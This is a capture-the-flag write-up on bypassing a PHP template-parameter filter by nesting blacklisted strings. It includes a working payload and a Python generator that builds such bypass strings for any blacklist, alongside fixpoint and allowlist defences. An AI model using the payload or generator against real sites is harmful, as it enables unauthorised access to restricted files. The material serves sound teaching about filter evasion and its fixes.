![eaa601cd6ff295dbd681865f279d014c.png](5df6af9b3cfd410f8ea0eb5926cf30b3.png)
Dirbusting/fuzzing turns up a `template` parameter that takes a file name:
`?template=index.php`
![79fded6c81e3b452b0b0328788167cc0.png](8f45ee8b15434726bf16ddcff86a5398.png)
Test the PHP code locally to figure out how to bypass the sanitization. It turns out the filter can be beaten by nesting, because it strips each blacklisted string in a single pass and never rescans its own output:
`secretadsecadmin.phpretadmadmin.phpin.phpmin.php`
This works because the code first removes all instances of `admin.php` (one left-to-right pass, non-recursive), so the above becomes
`secretadsecretadmin.phpmin.php`
It then removes all instances of `secretadmin.php`, which leaves exactly
`secretadmin.php`
The same trick works against any blacklist built from sequential `str_replace()` calls; a filter that loops until nothing changes would block it, and an allowlist of template names would remove the problem entirely.
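The nesting trick generalizes to any chain of single-pass removals, not just these two strings. The following is an added Python example, not code from the challenge or this writeup. It assumes (the original PHP is only visible in the screenshot) that the sanitizer is a sequential `str_replace()` of `admin.php` and then `secretadmin.php` on the `template` value; Python's `str.replace()` has the same single-pass, non-recursive semantics, so the model reproduces the bypass. It checks the payload above, builds a payload for any target and blacklist by working backwards through the chain, and contrasts the weak filter with a fixpoint version and an allowlist. `BLACKLIST`, `ALLOWED_TEMPLATES`, `build_payload` and the other names are the example's own.

```python
"""Model of the template-name filter from the writeup plus a generic payload
builder for it. Added example, not code from the original challenge.

Assumption (the challenge's PHP is only shown as a screenshot): the filter is
equivalent to
    $t = str_replace(["admin.php", "secretadmin.php"], "", $_GET["template"]);
PHP's str_replace() makes one left-to-right pass per search string and never
rescans its own output. Python's str.replace() behaves the same way.
"""

BLACKLIST = ["admin.php", "secretadmin.php"]  # applied in this order (assumed)


def sanitize(value, blacklist=BLACKLIST):
    """The weak filter: one non-recursive pass per blacklisted token."""
    for token in blacklist:
        value = value.replace(token, "")
    return value


def _protect(s, token):
    """Return a string that collapses to `s` after one pass removing `token`.

    Every intact copy of `token` in `s` would be eaten, so each copy is split
    and a second copy is inserted into the gap. The inner copy is the one the
    filter removes, which stitches the outer copy back together.
    """
    if token not in s:
        return s
    for k in range(1, len(token)):
        nested = token[:k] + token + token[k:]
        candidate = s.replace(token, nested)
        if candidate.replace(token, "") == s:  # guard against new matches at the seams
            return candidate
    raise ValueError(f"no nesting of {token!r} survives the filter")


def build_payload(target, blacklist=BLACKLIST):
    """Work backwards through the chain: the token removed last is protected
    first, so that each replace() in the real filter undoes exactly one layer."""
    payload = target
    for token in reversed(blacklist):
        payload = _protect(payload, token)
    if sanitize(payload, blacklist) != target:
        raise RuntimeError("payload does not survive the filter chain")
    return payload


def sanitize_fixpoint(value, blacklist=BLACKLIST):
    """Stronger blacklist: repeat until nothing changes, so nested copies
    cannot survive. Still a blacklist; the allowlist below is the real fix."""
    while True:
        stripped = sanitize(value, blacklist)
        if stripped == value:
            return stripped
        value = stripped


ALLOWED_TEMPLATES = {"index.php", "about.php"}  # constructed allowlist


def resolve_template(name):
    """Allowlist check: only exact, known template names are accepted."""
    return name if name in ALLOWED_TEMPLATES else None


if __name__ == "__main__":
    writeup_payload = "secretadsecadmin.phpretadmadmin.phpin.phpmin.php"
    print(sanitize(writeup_payload))             # secretadmin.php
    generated = build_payload("secretadmin.php")
    print(generated, "->", sanitize(generated))  # ... -> secretadmin.php
    print(sanitize_fixpoint(generated))          # secret
    print(resolve_template(generated))           # None
```

`build_payload` produces a shorter payload than the hand-made one above (it only nests at the occurrences that must be protected), but both survive `sanitize` and both are destroyed by `sanitize_fixpoint`, which keeps stripping until the string stops changing. Note that the fixpoint filter still mangles the input (`secretadmin.php` collapses to `secret`), which is why a template loader should compare against an allowlist rather than try to clean a blacklist.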
![6cf3b74018621fd025c3cf3b442cdff8.png](9028d94738e4494abd1b2708d91c4dcc.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #php #filter_evasion #web
Related: